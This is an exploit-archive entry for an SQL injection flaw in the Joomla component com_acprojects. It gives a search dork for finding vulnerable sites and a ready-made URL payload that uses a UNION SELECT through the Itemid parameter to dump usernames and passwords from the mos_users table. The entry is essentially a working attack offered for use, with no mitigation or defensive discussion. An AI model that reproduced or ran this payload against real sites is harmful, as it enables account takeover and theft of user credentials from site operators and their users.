id: 10958
date: 02/17/2010
title: Joomla Component com_acprojects Sql Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

===========================================================
Joomla Component com_acprojects Sql Injection Vulnerability
===========================================================

Joomla Component com_acprojects Sql Injection Vulnerability
==============================================================
 
####################################################################
.:. Author : AtT4CKxT3rR0r1ST 

.:. Bug Type : Sql Injection[Mysql]

.:. Dork : inurl:"com_acprojects"
 
####################################################################
 
===[ Exploit ]===
 
www.site.com/index.php?option=com_acprojects&page=7&Itemid=[SQL]&lang=de
 
www.site.com/index.php?option=com_acprojects&page=7&Itemid=null+and+1=2+union+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users&lang=de
 
 
####################################################################



#  0day.today [2023-03-27]  #